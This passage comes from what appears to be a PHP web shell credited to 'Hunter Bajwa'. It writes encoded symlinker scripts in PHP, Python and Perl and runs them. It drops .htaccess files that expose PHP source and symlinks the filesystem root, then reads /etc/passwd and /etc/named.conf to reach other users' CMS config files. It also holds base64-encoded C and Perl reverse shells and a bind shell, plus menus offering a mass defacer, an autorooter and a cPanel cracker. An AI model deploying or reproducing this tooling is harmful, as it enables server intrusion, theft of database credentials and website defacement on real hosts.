5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvYWRtaW4vY29uZi5waHAnLCAkdXNlciAuICctNS50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9hZG1pbi9jb25maWcucGhwJywgJHVzZXIgLiAnLU9wZW5fQ2FydC50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9jb25mX2dsb2JhbC5waHAnLCAkdXNlciAuICctaW52aXNpby50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9pbmNsdWRlL2RiLnBocCcsICR1c2VyIC4gJy03LnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL2Nvbm5lY3QucGhwJywgJHVzZXIgLiAnLTgudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvbWtfY29uZi5waHAnLCAkdXNlciAuICctbWstcG9ydGFsZTEudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvaW5jbHVkZS9jb25maWcucGhwJywgJHVzZXIgLiAnLTEyLnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL3NldHRpbmdzLnBocCcsICR1c2VyIC4gJy1TbWYudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvdmIvaW5jbHVkZXMvY29uZmlnLnBocCcsICR1c2VyIC4gJy12QnVsbGV0aW4xLnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL2luY2x1ZGVzL2NvbmZpZy5waHAnLCAkdXNlciAuICctdkJ1bGxldGluMi50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9mb3J1bS9pbmNsdWRlcy9jb25maWcucGhwJywgJHVzZXIgLiAnLXZCdWwzLVBocGJiMi50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9jYy9pbmNsdWRlcy9jb25maWcucGhwJywgJHVzZXIgLiAnLXZCdWxsZXRpbjQudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvaW5jL2NvbmZpZy5waHAnLCAkdXNlciAuICctbXliYi50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9jb25maWcucGhwJywgJHVzZXIgLiAnLUNvbmZpZy1QaHBiYjEudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvaW5jbHVkZXMvZnVuY3Rpb25zLnBocCcsICR1c2VyIC4gJy1waHBiYjMudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvb3BlbmNhcnQvYWRtaW4vY29uZmlnLnBocCcsICR1c2VyIC4gJy1PcGVuX2NhcnQyLnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL2FwcC9ldGMvY29uZmlnLnhtbCcsICR1c2VyIC4gJy1NYWdlbnRvMS50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9hcHAvZXRjL2xvY2FsLnhtbCcsICR1c2VyIC4gJy1NYWdlbnRvMi50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9zaXRlcy9kZWZhdWx0L3NldHRpbmdzLnBocCcsICR1c2VyIC4gJy1EcnVwYWwudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvZHJ1cGFsL3NpdGVzL2RlZmF1bHQvc2V0dGluZ3MucGhwJywgJHVzZXIgLiAnLURydXBhbC50eHQnKTsKICAgIH0KICAgIGVjaG8gJzxiIGNsYXNzPSJjb25lIj48Zm9udCBmYWNlPSJUYWhvbWEiIGNvbG9yPSJMYXduR3JlZW4iIHNpemU9IjJwdCI+PGI+Q29uZ3JhdHVsYXRpb24gPT0+PiA8L2I+IDxhIHRhcmdldD0iX2JsYW5rIiBocmVmPSJCYWp3YSI+PGZvbnQgY29sb3I9Ikxhd25HcmVlbiIgc2l6ZT0iMnB0Ij5Db25maWcgbGlzdDwvYT48L2ZvbnQ+PC9iPic7Cn0KZWNobyAnPGJyPjxicj48YnI+PGJyPic7CmVjaG8gJyoqWyBVcGxvYWRlciBdKionOwplY2hvICc8YnI+PGJyPic7CmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7CmVjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT4nOwppZiAoJF9QT1NUWydfdXBsJ10gPT0gIlVwbG9hZCIpIHsKICAgIGlmIChAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgewogICAgICAgIGVjaG8gJzxiPjxmb250IGNvbG9yPSJMYXduR3JlZW4iPlVwbG9hZCBTdWNjZXNzZnVsbHkhISEgPC9mb250PjwvYj48YnI+PGJyPic7CiAgICB9IGVsc2UgewogICAgICAgIGVjaG8gJzxiPjxmb250IGNvbG9yPSJyZWQiPlVwbG9hZCBGYWlsZWQhISEgPC9iPjxicj48L2ZvbnQ+JzsKICAgIH0KfQo/Pjxicj48YnI+CjxkaXYgaWQ9Im5hbWUiPiZjb3B5OyA8YSBocmVmPSJodHRwczovL3d3dy5mYWNlYm9vay5jb20vQmxhY2tMZWV0czEzMzcvIiB0YXJnZXQ9Il9ibGFuayI+VGVhbSBCbGFja0xlZXRzPC9hPi4gQ29kZWQgJiBNb2RpZmllZCBCeSA8YSBocmVmPSJodHRwczovL3d3dy5mYWNlYm9vay5jb20vSHVudGVyQmFqd2FPZmZpY2lhbC8iIHRhcmdldD0iX2JsYW5rIj5IdW50ZXIgQmFqd2E8L2E+ICYgPGEgaHJlZj0iaHR0cHM6Ly93d3cuZmFjZWJvb2suY29tL0h1bnRlci5CYWp3YTEzMzciIHRhcmdldD0iX2JsYW5rIj4hISEhPC9hPjwvZGl2Pgo8L2JvZHk+PC9odG1sPg==";
2779 $Hunter_Bajwa_symlink = fopen("symlinker.php", "w");
2780 @fwrite($Hunter_Bajwa_symlink, htmlspecialchars_decode(gzinflate(base64_decode($php_symlinker))));
2781 @fclose($Hunter_Bajwa_symlink);
2782 chmod("symlinker.php", 0755);
2783 ?>
2784 <center>
2785 <iframe src="symlinker.php" width="100%" height="600"></iframe>
2786 </center>
2787 <?php
2788 }
2789
2790
2791 if(isset($_POST['p1']) && $_POST['p1']=='python')
2792 {
2793 $htsyma = "eJydVNtu2zgQfY4B/wPLRWo7caSkl31wJAPeBt0NsEULZN/qoqDEUcWGIgWSrq0+9Ns7Q1tyr4uifhCHw8O5nDn0H+nZqy7U1oxH45FqWusCC6qBYWP9YPruaDugC9Yn6AzQTHlptXXsGZ+Rvw6C5YyvzXOlgS1Ygo6yBO9ZmrJnDkQAye420VVttO4erA0fjyq6tNKavXKWjsCzG2sAD++6Ritzz/7qWoH+H11unTKBch7tT/zsz8th93UM9ujy6gkrOlavdi8dC+7y/cqcseNl9tXvroVSCc3+dgDhIwsWu3ohNk4FYZRgq4AN3oNjD9mHW3d/K78rIpLViHuQyvnpJLj3ZjeZRW9Zo+8L13jkN97lr9+goQLsovUF1dqwC2QSa07CLhwYJ+petkFZ49mtkbBD8p5bre0W+/4X+/Zrc6MclMG6LgLofluHRq/NSsr/uhYYhmPoa6PnH2GkxpZ6J7bUYBbbgpnyYaJ8zrfnVEOTbJENmNbRLrX1MJ31LCA69hUnnFHSZRZU0LD8lalk6R6blWACuGVWWYwZFZcXGolnXn2E/OmPgmVFj4+YJ8sXQgICvpk7wW4lCDr5n7neZCnFWvZL8dNiHmODosCieZx9T9wkhVCmVN1WTuYTFyWQ2wTfhCS6COggqZSRQmuE17aBdL09n8xtHHSFr2yH8mDKMLsYj05ok9MHY7SYH/pLGJ6in5CYEtFidjkl3DAUfsHPHqM0d6QyKtAnWvlAYuTpB+FSIxqQ/Jh2D8TE0YjJo5Xvl6EAnsgCdcFjdlLwkD7ihgIqNESoc0z8DmnZRgZUxXjabgqtyrcklJRTRsJRwoj/5nw8Au2hPyWFpf1BaTekmPwK47Y+32u31z1Jl2rEk4N2fTU0Wx04JvYodPT1/cemyHtSbXJCvr5cPH1De59H0LDHbhCS+wg+OWbiWUDpBMl86DTkpKGLSjRKd4tSaFU4dR19W1Dv6rAorJbXUWOLqLHr5anHVyF/L4QD+bsBlplgtYMq3//57JV26k89C8LhEPO3WB++wBheLGMKfjo9zGFOXO0/NKp55Go2i9z0ozqs51efAVOkH/Q=";
2794
2795 $lelwasym = gzuncompress(base64_decode($htsyma));
2796 $fp122 = fopen('y.py','w');
2797 $fw1111 = fwrite($fp122,$lelwasym);
2798 @fclose($fw1111);
2799 ?> <?php
2800 $eaacho = system("python y.py"); echo "$eaacho"; echo "<center><iframe src='trjnx' height='400' class='lel' width='600'></iframe></center>";
2801 @unlink ('y.py');
2802 }
2803 if(isset($_POST['p1']) && $_POST['p1']=='perl')
2804
2805 {
2806 $plsym = "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";
2807
2808$lelwasym = gzuncompress(base64_decode($plsym));
2809 $fp1212 = fopen('sym.pl','w');
2810 $fw11111 = fwrite($fp1212,$lelwasym);
2811 @fclose($fw11111);
2812 chmod("sym.pl",0755);
2813 ?><br><center><iframe src="sym.pl" height="400" class="button" width="600"></iframe></center><?php }
2814 if(isset($_POST['p1']) && $_POST['p1']=='phpsym')
2815 {
2816
2817
2818error_reporting(0);
2819ob_start();
2820
2821$dir = "sec1";
2822@mkdir($dir);
2823if($dir){
2824} else {
2825}
2826$dir2 = "sec2";
2827@mkdir($dir2);
2828if($dir2){
2829} else {
2830}
2831$dir3 = "sec3";
2832@mkdir($dir3);
2833if($dir3){
2834} else {
2835}
2836$dir4 = "sec4";
2837@mkdir($dir4);
2838if($dir4){
2839} else {
2840}
2841$dir5 = "sec5";
2842@mkdir($dir5);
2843if($dir5){
2844} else {
2845}
2846$dir6 = "sec6";
2847@mkdir($dir6);
2848if($dir6){
2849} else {
2850}
2851$dir7 = "sec7";
2852@mkdir($dir7);
2853if($dir7){
2854}
2855else {
2856}
2857
2858
2859
2860$sec1 = "sec1/.htaccess";
2861$hsec1 = fopen($sec1, 'w') or die("Error: Can't open file");
2862$con1 = "Options Indexes FollowSymLinks
2863DirectoryIndex ssssss.htm
2864AddType txt .php
2865AddHandler txt .php
2866AddType txt .html
2867AddHandler txt .html
2868Options all
2869Options
2870Allow from all
2871Require None
2872Satisfy Any";
2873fwrite($hsec1, $con1);
2874fclose($hsec1);
2875
2876
2877
2878$sec2 = "sec2/.htaccess";
2879$hsec2 = fopen($sec2, 'w') or die("Error: Can't open file");
2880$con2 = "Options +FollowSymLinks
2881DirectoryIndex seees.html
2882RemoveHandler .php
2883AddType application/octet-stream .php ";
2884fwrite($hsec2, $con2);
2885fclose($hsec2);
2886
2887
2888$sec3 = "sec3/.htaccess";
2889$hsec3 = fopen($sec3, 'w') or die("Error: Can't open file");
2890$con3 = "Options +FollowSymLinks
2891DirectoryIndex Index.html
2892Options +Indexes
2893AddType text/plain .php
2894AddHandler server-parsed .php";
2895fwrite($hsec3, $con3);
2896fclose($hsec3);
2897
2898$sec4 = "sec4/.htaccess";
2899$hsec4 = fopen($sec4, 'w') or die("Error: Can't open file");
2900$con4 = "Options Indexes FollowSymLinks
2901DirectoryIndex ssssss.htm
2902AddType txt .php
2903AddHandler txt .php";
2904fwrite($hsec4, $con4);
2905fclose($hsec4);
2906
2907$sec5 = "sec5/.htaccess";
2908$hsec5 = fopen($sec5, 'w') or die("Error: Can't open file");
2909$con5 = "Options all
2910DirectoryIndex Sux.html
2911AddType text/plain .php
2912AddHandler server-parsed .php
2913AddType text/plain .html";
2914fwrite($hsec5, $con5);
2915fclose($hsec5);
2916
2917
2918$sec6 = "sec6/.htaccess";
2919$hsec6 = fopen($sec6, 'w') or die("Error: Can't open file");
2920$con6 = "Options +FollowSymLinks
2921DirectoryIndex Sux.html
2922Options +Indexes
2923AddType text/plain .php
2924AddHandler server-parsed .php
2925AddType text/plain .html";
2926fwrite($hsec6, $con6);
2927fclose($hsec6);
2928
2929$sec7 = "sec7/.htaccess";
2930$hsec7 = fopen($sec7, 'w') or die("Error: Can't open file");
2931$con7 = "Options Indexes FollowSymLinks
2932AddType text/plain .php .inc .asp .php3
2933Options All
2934Options All";
2935fwrite($hsec7, $con7);
2936fclose($hsec7);
2937
2938
2939
2940for ($k=1;$k<8;$k++){
2941if("$fp$k"){
2942chdir('sec'.$k);
2943system('ln -s / 1.txt');
2944chdir('../');
2945}
2946else{ echo "Error";
2947}
2948}
2949
2950echo "<center><table border='1' align='center' width='80%'><h3><td><a>User</td></a><td><a>Sym</a></td></h3></center>";
2951$file = file('/etc/passwd');
2952if(!$file)
2953{
2954
2955 die ("</br></br><center><h2><a>ERROR !</a></h2></center>");
2956}
2957else
2958{
2959foreach ($file as $f){
2960
2961 $u=explode(':', $f);
2962 $user = $u['0'];
2963 echo "<tr><td>".$user."</td><td><a href='sec1/1.txt/home/".$user."/public_html/' >Sym1</a>~<a href='sec2/1.txt/home/".$user."/public_html/' >Sym2</a>~<a href='sec3/1.txt/home/".$user."/public_html/' >Sym3</a>~<a href='sec4/1.txt/home/".$user."/public_html/' >Sym4</a>~<a href='sec5/1.txt/home/".$user."/public_html/' >Sym5</a>~<a href='sec6/1.txt/home/".$user."/public_html/' >Sym6</a>~<a href='sec7/1.txt/home/".$user."/public_html/' >Sym7</a></td></tr>";
2964}
2965}
2966 }
2967
2968
2969 if(isset($_POST['p1']) && $_POST['p1']=='phpsym1')
2970 {
2971
2972
2973 echo "<center><table border='1' align='center' width='80%'><h3><td><a>Domains</td></a><td><a>User</a></td><td><a>Sym</a></td></h3></center>";
2974if(!is_file('DATA.txt')){
2975$named = @file("/etc/named.conf");
2976}else{
2977$named = @file("DATA.txt");
2978}
2979if(!$named)
2980{
2981
2982 die ("</br></br><center><h2><a>ERROR !</a></h2></center>");
2983}
2984else
2985{
2986foreach($named as $dom){
2987preg_match_all('#zone "(.*)"#', $dom, $doms);
2988if(strlen(trim($doms[1][0])) > 2){
2989$user = posix_getpwuid(@fileowner("/etc/valiases/".$doms[1][0]));
2990echo "<tr><td><a href=http://www.".$doms[1][0]."/>".$doms[1][0]."</a></td><td><a>".$user['name']."</a></td><td><a href='sec1/1.txt/home/".$user['name']."/public_html/' >Sym1</a>~<a href='sec2/1.txt/home/".$user['name']."/public_html/' >Sym2</a>~<a href='sec3/1.txt/home/".$user['name']."/public_html/' >Sym3</a>~<a href='sec4/1.txt/home/".$user['name']."/public_html/' >Sym4</a>~<a href='sec5/1.txt/home/".$user['name']."/public_html/' >Sym5</a>~<a href='sec6/1.txt/home/".$user['name']."/public_html/' >Sym6</a>~<a href='sec7/1.txt/home/".$user['name']."/public_html/' >Sym7</a></td></tr>";
2991}
2992}
2993}
2994 } printFooter();
2995 }
2996
2997function actionImportScripts() {
2998 printHeader();
2999echo '<center><br><h1>Shells By Hunter Bajwa</h1></center><div class="content">
3000<br>
3001<table border="1%" align="center" cellpadding="10">
3002<tr>
3003<td>Click And Get The Shells</td>
3004<tr><td>
3005<form action="" method="post">
3006<input type = "submit" name="dhanush" value ="Dhanush Shell">
3007</td></tr>
3008<tr><td>
3009<form action="" method="post">
3010<input type = "submit" name="anonghosts" value ="AnonGhosts Shell"></td></tr>
3011<tr><td>
3012<form action="" method="post">
3013<input type = "submit" name="blackhat" value ="BlackHat Shell"></td></tr>
3014<tr><td>
3015<form action="" method="post">
3016<input type = "submit" name="imageshell" value ="Hunter Bajwa Image Shell"></td></tr>
3017<tr><td>
3018<form action="" method="post">
3019<input type = "submit" name="madspot" value ="Madspot Shell"></td></tr>
3020<tr><td>
3021<form action="" method="post">
3022<input type = "submit" name="pcd" value ="Pak Cyber Defenders Shell"></td></tr>
3023<tr><td>
3024<form action="" method="post">
3025<input type = "submit" name="cheta" value ="Kashimiri Cheetah Shell"></td></tr>
3026<tr><td>
3027<form action="" method="post">
3028<input type = "submit" name="1337worm" value ="1337 Worm Shell"></td></tr>
3029<tr><td>
3030<form action="" method="post">
3031<input type = "submit" name="b374k" value ="b374k Shell"></td></tr>
3032<tr><td>
3033<form action="" method="post">
3034<input type = "submit" name="joker" value ="Joker Shell"></td></tr></div>';
3035
3036
3037
3038
3039
3040
3041 printFooter();
3042}
3043
3044
3045
3046function actionImportTools () {
3047 printHeader();
3048 echo '<center><h1>Tools By Hunter Bajwa</h1></center><div class="content">
3049<br>
3050<table border="1%" align="center" cellpadding="10">
3051<tr>
3052<td>Just Click And Get The Tools</td>
3053<tr><td>
3054<form action="" method="post">
3055<input type = "submit" name="symlinker" value ="Hunter Bajwa Symlinker"></td></tr>
3056<tr><td>
3057<form action="" method="post">
3058<input type = "submit" name="mass" value ="Wordpress Mass Defacer"></td></tr>
3059<tr><td>
3060<form action="" method="post">
3061<input type = "submit" name="zone" value ="Zone-h Mass Notifier"></td></tr>
3062<tr><td>
3063<form action="" method="post">
3064<input type = "submit" name="anoncmd" value ="AnonGhosts Console"></td></tr>
3065<tr><td>
3066<form action="" method="post">
3067<input type = "submit" name="madleets" value ="Madleets Console"></td></tr>
3068<tr><td>
3069<form action="" method="post">
3070<input type = "submit" name="rooter" value ="Autorooting Perl Script"></td></tr>
3071<tr><td>
3072<form action="" method="post">
3073<input type = "submit" name="cpc" value ="Control Panel Cracker"></td></tr></div>';
3074 printFooter();
3075}
3076
3077
3078function actionBackConnect() {
3079 printHeader();
3080 $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";
3081 $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
3082 $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";
